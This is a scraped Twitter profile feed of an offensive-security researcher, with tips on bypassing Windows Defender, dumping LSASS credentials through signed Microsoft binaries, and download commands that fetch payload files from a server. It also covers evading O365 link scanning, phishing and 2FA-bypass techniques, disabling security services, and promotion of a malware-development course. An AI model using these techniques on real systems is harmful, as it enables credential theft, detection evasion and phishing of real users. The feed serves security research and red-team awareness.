mr.d0x Profile
mr.d0x

@mrd0x

Followers
42K
Following
3K
Media
48
Statuses
1K

Security researcher | Co-founder https://t.co/QxBlzpa7Y4 | https://t.co/zqMXQRZRGl | https://t.co/Fq7WSqU9kI | https://t.co/eKezFcOEcL

Joined November 2020
Don't wanna be here? Send us removal request.
@mrd0x
mr.d0x
2 years
MalDev Academy is ready!. Website: MaldevAcademy[.]com.Launch date: April 16th, 2023. - 32 Beginner modules.- 49 Intermediate modules.- 10 Advanced modules.- 20 in the works for updates in the next few months.- 65 Custom code samples. Very fair pricing, starting at 249$. @NUL0x4C.
167
266
863
@mrd0x
mr.d0x
3 years
I published a blog article detailing a phishing technique I called Browser in the Browser (BITB) Attack. It's very simple but can be very effective. I also published templates on my Github feel free to test them out.
Tweet media one
112
1K
4K
@mrd0x
mr.d0x
3 years
If you rename procdump.exe to dump64.exe and place it in the "C:\Program Files (x86)\Microsoft Visual Studio\*" folder, you can bypass Defender and dump LSASS.
Tweet media one
48
1K
3K
@mrd0x
mr.d0x
3 years
Bypass Defender AV static detection:. If you name a malicious file DumpStack.log Defender doesn't scan it.
Tweet media one
41
1K
3K
@mrd0x
mr.d0x
3 years
I'll be dropping a new phishing technique for stealing credentials & bypassing 2FA today. You do not want to miss this.
37
385
2K
@mrd0x
mr.d0x
3 years
Steal Credentials & Bypass 2FA Using noVNC.
Tweet media one
54
670
2K
@mrd0x
mr.d0x
3 years
Here I bypassed Defender AV by making:. eyb files as .exe . faq files as .dll. I'm sure this can work on other security solutions and for many other blacklisted techniques. (1/2)
Tweet media one
27
508
2K
@mrd0x
mr.d0x
2 years
Chromium's application mode can be used to easily build realistic phishing desktop applications. Enjoy.
Tweet media one
24
460
1K
@mrd0x
mr.d0x
2 years
Reminder that creating a memory dump of Outlook.exe not only produces access tokens but also potentially sensitive email content.
Tweet media one
Tweet media two
20
248
1K
@mrd0x
mr.d0x
8 months
Phishing with Progressive Web Apps: More fake URL bars :)
Tweet media one
19
263
991
@mrd0x
mr.d0x
3 years
LOLBIN to dump LSASS:. Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions. Binary: DumpMinitool.exe. The params are case sensitive.
Tweet media one
Tweet media two
Tweet media three
14
311
932
@mrd0x
mr.d0x
3 years
Another way to download files using msedge/chrome:. [msedge.exe | chrome.exe] --headless --enable-logging --disable-gpu --dump-dom " http://server/evil.b64.html" > out.b64. - Downloaded file should end with .html. - Binaries should be encoded.
Tweet media one
5
345
897
@mrd0x
mr.d0x
3 years
Today I've launched I've been analyzing malware source code that utilizes WinAPIs and have been categorizing them. Please feel free to contribute as I know the current list is not exhaustive.
25
349
886
@mrd0x
mr.d0x
3 years
Living Off Trusted Sites: Attackers are using popular legitimate domains to conduct attacks (e.g. phishing). I've attempted to compile a list of legitimate domains that can be abused by attackers. As usual, feel free to contribute.
34
335
834
@mrd0x
mr.d0x
2 years
Stealing Access Tokens From Office Desktop Applications.
9
274
803
@mrd0x
mr.d0x
3 years
Bypassing Cortex XDR.
27
296
779
@mrd0x
mr.d0x
3 years
It seems that you can still completely bypass Defender AV's static detection using *.log files, only now you have to use DLLs instead of EXEs.
Tweet media one
Tweet media two
Tweet media three
11
260
768
@mrd0x
mr.d0x
3 years
If you compose an email using the "Reply" function on O365 which has a link, intercept the request and add an extra empty href attribute then O365 won't scan the link anymore. <a href="phishing link">click</a> ==> junk.<a href="" href="phishing link">click</a> ==> inbox
Tweet media one
Tweet media two
10
241
748
@mrd0x
mr.d0x
2 years
For the past couple of months @NUL0x4C and I have been working on a module-based malware dev training course that covers various techniques in-depth. Its emphasis is on simplifying complex concepts & evasion. Every module contains highly commented custom code. Stay tuned!
Tweet media one
37
158
749
@mrd0x
mr.d0x
3 years
Inserted attachments on OneNote can be directly downloaded. The domain used is onenoteonlinesync[.]onenote[.]com. 1. Insert a file attachment on a OneNote Notebook.2. Double click the inserted attachment and grab the direct download link. Added to
Tweet media one
Tweet media two
7
228
691
@mrd0x
mr.d0x
3 years
EvilSelenium - This project weaponizes Selenium to attack Chrome. Dump saved credentials, cookies, take (authenticated) screenshots, dump emails from gmail/o365 or chats from Whatsapp and exfiltrate & download files. ENJOY.
8
261
642
@mrd0x
mr.d0x
3 years
Twitter is great for sharing infosec related stuff, but it's also too dynamic and people may miss stuff. So every few months I'll link any interesting tweets I had made. Enjoy.
12
169
610
@mrd0x
mr.d0x
3 years
msedge kiosk mode + a fake Windows login page. Don't know if it's practical, but interesting for sure. msedge.exe --app=" http://example[.]com/index.html" --kiosk
Tweet media one
8
124
585
@mrd0x
mr.d0x
3 years
Outlook attachments can be directly downloaded. 1. Compose an email.2. Attach a file (add .txt to the end if it's a restricted file type).3. Click on the file to download it and grab the link (attachment[.]outlook[.]live[.]net). Link is valid for ~15 minutes.
Tweet media one
16
209
585
@mrd0x
mr.d0x
3 years
Here it is:
19
164
577
@mrd0x
mr.d0x
2 years
Reminder to not trust calendar (.ics) attendees.
Tweet media one
10
159
586
@mrd0x
mr.d0x
3 years
LOLBIN(s): mpiexec.exe & smpd.exe.Path: C:\Program Files\Microsoft MPI\Bin. mpiexec.exe spawns smpd.exe which then spawns an executable. Usage: mpiexec.exe -n 1 c:\path\to\binary.exe . (1/2)
Tweet media one
Tweet media two
Tweet media three
2
221
568
@mrd0x
mr.d0x
3 years
explorer.exe can launch a browser and download a file. Append a harmless extension to the file then remove it after download. Default browser:.explorer.exe https://server/file.exe.txt. Edge:.explorer.exe microsoft-edge: https://server/file.exe.txt.
6
156
492
@mrd0x
mr.d0x
3 years
Abusing Google Drive's Email File Functionality for phishing. Enjoy!.
3
182
476
@mrd0x
mr.d0x
3 years
Anyone else aware that .asd files can contain macros? Literally just found out. Added to Filesec: .
Tweet media one
6
138
438
@mrd0x
mr.d0x
3 years
WebView2 desktop applications have functionality that allows for JS to be injected into any website & for cookies to be stolen. In my new blog post I explore how it can be used by attackers and I provide working code. Enjoy!.
11
160
410
@mrd0x
mr.d0x
3 years
Demo:.Injecting a JS keylogger using WebView2 into login[.]microsoftonline[.]com. Better quality: Blog post:
10
142
382
@mrd0x
mr.d0x
2 years
Didn't have time to talk about the newly released TLDs last week, but here we go. File Archiver In The Browser: Emulating file archive software in the browser with a .zip domain for phishing.
11
143
377
@mrd0x
mr.d0x
3 years
Phishing O365 Users With Spoofed Cloud Attachments.
3
152
362
@mrd0x
mr.d0x
3 years
Procdump dump lsass.Defender: Threat detected!. Sqldumper dump lsass.Defender: Sure, go right ahead!. btw dumping lsass with sqldumper.exe is not new, actually its quite old.
Tweet media one
Tweet media two
5
96
355
@mrd0x
mr.d0x
3 years
devinit.exe - Great MS signed tool with tons of useful commands but needs VS to run properly. I tested msi-install, it downloads a msi file to C:\Windows\Installer\ then installs it. devinit.exe run -t msi-install -i http://10.0.0.18/out.msi
Tweet media one
4
114
345
@mrd0x
mr.d0x
3 years
LOLBIN: Microsoft.NodejsTools.PressAnyKey.exe. Execute a local binary or one from a file share. Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools
Tweet media one
Tweet media two
Tweet media three
2
117
328
@mrd0x
mr.d0x
9 months
It's unfortunate to see how many people no longer share tools/research the same way as before. I believe funding researchers and developers is the way forward.
28
22
291
@mrd0x
mr.d0x
3 years
Procdump works against Defender with a simple rename. It quarantines the generated .dmp file but you have a few seconds to make a copy of it before it's removed. I've seen other security solutions that do this, try to copy the file quickly before it's removed.
Tweet media one
Tweet media two
8
88
281
@mrd0x
mr.d0x
3 years
I've create a simple Python script that converts executables generated with pe_to_shellcode to a format that works with cdb.exe. Useful for evasion & application whitelisting bypass.
0
117
270
@mrd0x
mr.d0x
3 years
Attempting to access protection history after detecting a malicious file with a really long name + path crashes Defender's UI lol.
7
45
257
@mrd0x
mr.d0x
9 months
Lol
Tweet media one
Tweet media two
Tweet media three
@Unit42_Intel
Unit 42
9 months
2024-05-14 (Tuesday): #DarkGate activity. HTML file asks victim to paste script into a run window. Indicators available at #TimelyThreatIntel #Unit42ThreatIntel #Wireshark #InfectionTraffic
Tweet media one
Tweet media two
Tweet media three
Tweet media four
6
51
246
@mrd0x
mr.d0x
11 months
How much awareness is there around Context Menu Spoofing/Hijacking for persistence?. Here's hijacking SentinelOne's "Scan for threats" to run a command.
6
69
238
@mrd0x
mr.d0x
3 years
You can spoof almost everything in a Calendar invite by customizing an .ics file. I think this can definitely trick many users.
2
85
221
@mrd0x
mr.d0x
3 years
You should probably be aware of this technique. Custom Previews For Malicious Attachments.
2
86
207
@mrd0x
mr.d0x
3 years
I mentioned a few days ago that there's two LOLBIN binaries that do DLL injection. After re-checking the digital signature I don't believe they're considered LOLBINs (correct me if I'm wrong) but since they're interesting I'll share them anyway. (1/2)
Tweet media one
Tweet media two
2
74
202
@mrd0x
mr.d0x
3 years
Start Edge minimized, download file, delay a few seconds to allow download to complete and kill Edge. start /min msedge.exe https://server/file.exe.zip && timeout 3 && taskkill /IM "msedge.exe" /F. Modify file extension back to original after download.
5
70
205
@mrd0x
mr.d0x
3 years
updated. Thanks to all the contributors.
6
51
193
@mrd0x
mr.d0x
2 years
Interesting initial access techniques dropping tomorrow at @MalDevAcademy
5
31
192
@mrd0x
mr.d0x
2 years
"Although the code and the technique was copied from the mrd0x original blogpost dating back to 2022, the analysed document is currently only detected by one antivirus engine on VirusTotal (eScan) at the time of writing." 🤔.
Tweet media one
2
46
192
@mrd0x
mr.d0x
11 months
Hijacking & Spoofing Context Menu Options.
5
49
172
@mrd0x
mr.d0x
3 years
Tampering with ForcePoint DLP.Write up on CVE-2022-27608 & CVE-2022-27609.
5
45
150
@mrd0x
mr.d0x
2 years
I'll be dropping two variations of a new initial access technique exclusively for @MalDevAcademy premium & lifetime users (in update 2 or update 3). Red teamers you'll be very happy. Blue teamers you'll want to have safeguards in place for this.
3
24
153
@mrd0x
mr.d0x
3 years
I actually didn't know the about the Windows Device Portal feature. Kernel & process dumps, process and network information, application management all with optional authentication? I'll take it.
Tweet media one
Tweet media two
2
36
141
@mrd0x
mr.d0x
3 years
16 new entries added to Thanks for the contributions.
4
37
142
@mrd0x
mr.d0x
2 years
All security solution vulns I previously found were too easily exploitable. In the newly posted Exploiting EDRs For Evasion module in @MalDevAcademy I demonstrated how changing a non-protected registry key prevents logs from arriving to the EDR console. Too easy.
5
21
131
@mrd0x
mr.d0x
2 years
Check out AtomLdr, something you'll be able to build after completing this training.
3
25
131
@mrd0x
mr.d0x
3 years
Or just fake the entire Desktop using HTML/CSS/JS. LOL. Win10css:
Tweet media one
4
8
122
@mrd0x
mr.d0x
1 year
Havoc made the cut @C5pider 🎉.
@kalilinux
Kali Linux
1 year
Before we wrap up the year, it’s time to get out one last Kali release for 2023. Announcing Kali 2023.4! for a focus on the addition of Hyper-V support to Vagrant, ARM64 Cloud images, support for the Pi 5, and an update to Gnome 45. Check it out!
Tweet media one
1
3
117
@mrd0x
mr.d0x
3 years
I guess this is their way of whitelisting their dump64.exe tool that comes with Microsoft Visual Studio.
1
10
114
@mrd0x
mr.d0x
3 years
20 new websites added to An interesting site added is feedproxy[.]google[.]com. I was not aware that it's being used in phishing attacks. Creds: @BushidoToken.
7
32
116
@mrd0x
mr.d0x
2 years
2
15
110
@mrd0x
mr.d0x
3 years
@chvancooten And if you want to bypass that big splash screen, you can :).
3
33
111
@mrd0x
mr.d0x
3 years
Outlook link preview spoofing. Either modify the HTML while sending it or insert a different link when it tries to fetch a preview of the site.
Tweet media one
1
7
104
@mrd0x
mr.d0x
3 years
LOTS Project updated: 15 new entries.
2
36
104
@mrd0x
mr.d0x
7 months
1
32
101
@mrd0x
mr.d0x
3 years
Since any file extension can be modified to become executable, wouldn't something like this mess with rules that look for "cmd.exe" spawning "powershell.exe" for example?
Tweet media one
4
5
95
@mrd0x
mr.d0x
3 years
Just added a new batch of sites to Thanks to all the contributors. Will continue to add more.
1
20
96
@mrd0x
mr.d0x
3 years
For example, to make .eyb act as a .exe go to Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.eyb and modify it as shown in the image. (2/2)
Tweet media one
4
14
96
@mrd0x
mr.d0x
3 years
LOTS Project updated with 16 new entries. Thanks to all contributors.
0
25
90
@mrd0x
mr.d0x
2 years
Throwback:
@_zblurx
Thomas Seigneuret
2 years
Want to bypass Windows Defender when dumping LSASS ? Just dump into .log files😅
Tweet media one
3
10
91
@mrd0x
mr.d0x
2 years
I'll be disclosing a new LOLBIN this week on the @MalDevAcademy Discord channel that can be used for downloading files on the machine. Stay tuned!.
2
6
84
@mrd0x
mr.d0x
2 years
Hope you all enjoy it.
@MalDevAcademy
MalDev Academy
2 years
MaldevAcademy[.]com is now live!.
4
9
81
@mrd0x
mr.d0x
2 years
Review:.
0
18
80
@mrd0x
mr.d0x
3 years
Hide your phishing link behind Google's domain. Thanks Google you're always adding some great "features".
0
35
81
@mrd0x
mr.d0x
3 years
Please make sure you're aware that this technique is not necessarily VNC specific. Of course it can work with any web-based remote access method (e.g. web-based RDP, TeamViewer etc). But I felt noVNC provided the most seamless experience to target users.
@mrd0x
mr.d0x
3 years
Steal Credentials & Bypass 2FA Using noVNC.
Tweet media one
1
15
77
@mrd0x
mr.d0x
3 years
Another 30 APIs added to since yesterday. Thanks for all your support. Please continue submitting APIs I'll add them as soon as possible.
0
17
73
@mrd0x
mr.d0x
3 years
t[.]m1[.]email[.]samsung[.]com is being used to redirect users to phishing websites. Reference:
1
20
69
@mrd0x
mr.d0x
3 years
Finally had some time to push new APIs on Sorry for the delay and thanks to all contributors.
1
14
69
@mrd0x
mr.d0x
3 years
Since MS Teams now allows external users to message users within an organization, the Teams Abuse article may be worth a revisit. I also updated it to add a few more techniques.
1
19
71
@mrd0x
mr.d0x
3 years
I disabled multiple security solutions using a simple method which involves stopping/modifying the dependencies of the service. 1. sc qc <service> ==> check dependencies.2. sc qc <dependency> ==> stop it or attempt to modify it through the registry.
0
14
63
@mrd0x
mr.d0x
1 year
Why does it feel like we're asking for too much?.
@vxunderground
vx-underground
1 year
All we want is a basic web browser with an ad blocker.
2
3
62
@mrd0x
mr.d0x
3 years
I added macros as a category on Credits to @Hexacorn for making me realize how many file extensions there are related to macros. I also removed a few other categories that I don't think are as useful as I initially thought they'd be. Enjoy!.
2
19
60
@mrd0x
mr.d0x
3 years
I really like 12ft[.]io which is used to bypass paywalls. But be aware that it can also be used to masquerade phishing links. Reference:
0
11
58
@mrd0x
mr.d0x
3 years
@vaisovbek Nope, like this:
1
6
58
@mrd0x
mr.d0x
3 years
Sorry if the images are blurry on the blog post. They are available on the Github Repo in far better resolution:.
0
8
60
@mrd0x
mr.d0x
3 years
Cortex XDR advisory.
5
6
57
@mrd0x
mr.d0x
3 years
@Warlockobama That's the first thing that comes to mind for sure. But now users will have 3 thoughts when they notice this:. 1.Suspicious .2.Technical glitch .3.Intended "feature". Maybe if we're lucky our odds may just be the latter two.
1
4
57
@mrd0x
mr.d0x
2 years
@n00py1 I mentioned an alternative way of doing this in one of my previous posts. Combine that with BITB and it becomes pretty realistic.
Tweet media one
1
8
54
@mrd0x
mr.d0x
3 years
I think this is a great example of how important it is to be conscious of what you put out there. The smallest things can potentially be used in ways you didn't expect.
5
6
46
@mrd0x
mr.d0x
3 years
Can confirm this works. Another way is to send an email saying "There's IT work going on you may receive a 2FA prompt, just accept it." Surprisingly it works.
0
8
42
@mrd0x
mr.d0x
3 years
Sometimes it's that simple.
@mrd0x
mr.d0x
3 years
Can confirm this works. Another way is to send an email saying "There's IT work going on you may receive a 2FA prompt, just accept it." Surprisingly it works.
0
11
41
@mrd0x
mr.d0x
3 years
Turns out args: 0,2,4 are useless and can be literally anything as long as args 1,3,5 are valid. Watch out for this if you're writing detection rules.
@4A616D6573
4A616D6573
3 years
@mrd0x Example that works:. /DumpMinitool.exe 1 'dump6.txt' 2 660 3 Full.Dump minitool: Started with arguments 1 dump6.txt 2 660 3 Full.Output file: 'dump6.txt'.Process id: 660.Dump type: Full.Dumped process.
Tweet media one
1
13
42
@mrd0x
mr.d0x
3 years
@techspence I only tested it with downloading and copying from a remote share. Using SMB is shown in the attached image. Also note that it's still subject to other methods of detection like behavior, heuristics etc.
Tweet media one
1
1
41
@mrd0x
mr.d0x
2 years
@mythicalcmd @NUL0x4C This training is far more in-depth. Also its text-based not video-based. There's custom code (all commented) and exclusive tools shared on there. Here's an example of one module that covers a custom tool 'HellShell'.
Tweet media one
2
5
42
@mrd0x
mr.d0x
11 months
@NinjaParanoid I feel like it’s a small part of the community but they’re just very loud and always seem to be morally and intellectually superior than everyone else.
2
0
40
@mrd0x
mr.d0x
2 years
Tweet media one
@mrd0x
mr.d0x
2 years
I'll be disclosing a new LOLBIN this week on the @MalDevAcademy Discord channel that can be used for downloading files on the machine. Stay tuned!.
0
2
36
@mrd0x
mr.d0x
3 years
Thanks to all those contributing and sorry for the delay. => new extensions added. => new APIs added.
1
15
38
@mrd0x
mr.d0x
2 years
One of the tools included in the upcoming malware dev course.
@NUL0x4C
NULL
2 years
Another tool for the upcoming Maldev Academy course! This tool is part of the entropy reduction module.
2
4
38
@mrd0x
mr.d0x
3 years
PoC:
1
8
36